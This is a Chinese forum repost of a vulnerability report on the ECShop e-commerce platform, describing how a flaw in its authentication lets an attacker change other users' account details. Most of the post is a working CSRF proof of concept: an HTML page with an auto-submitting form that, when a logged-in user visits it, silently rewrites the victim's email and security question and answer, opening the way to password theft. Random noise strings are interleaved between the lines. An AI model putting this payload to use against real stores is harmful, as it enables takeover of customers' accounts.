中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
# [/ R2 Q$ D. k3 p
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
1 W. ~- ?0 M' G
% u7 L' n/ A5 d: O! G* ]) n6 z
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
+ A6 h5 h5 W/ H( g- R
7 F/ M6 G5 m) N& V) _9 G
详细说明:
/ [8 q8 `" c% B) j& N5 P0 i
利用csrf和xss可以突破官方所说的“障碍”
9 q1 _# T2 t" x5 f( d7 X f
xss版本已经有人说明
4 H& Z& \. M! k
这里给出csrf版本
; G2 Y/ S* F! R+ }
' Z5 {. \; P4 x
漏洞证明:
# P/ ~7 O1 O; [8 d
<html>
; ]* ^# }* {- h2 W* }4 f6 z; c
<body>
+ B0 ?% ~' f$ B
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
0 C/ A( C$ a6 o& p; i. |
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
1 Y% J/ U9 s" F8 _& w
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
3 O1 W' r; ~1 P) Y2 F, e( G
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
% ?& l" E! B3 X
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
# ?3 C h3 I4 ~+ q
</body>
, f. W# P) W) x1 H3 l1 d m( n
<script>
/ P5 l2 C8 D/ D v u. a) Z! C& g
document.forms[0].submit();
9 m4 b; }( Y/ ?7 h6 Z3 a; @4 R
</script>
) i8 X$ w& j" {' I
</html>
6 e, x9 s" C4 u' L
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
; X8 J$ c* p }
% M. z# M6 I/ N+ d- X( p3 G
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2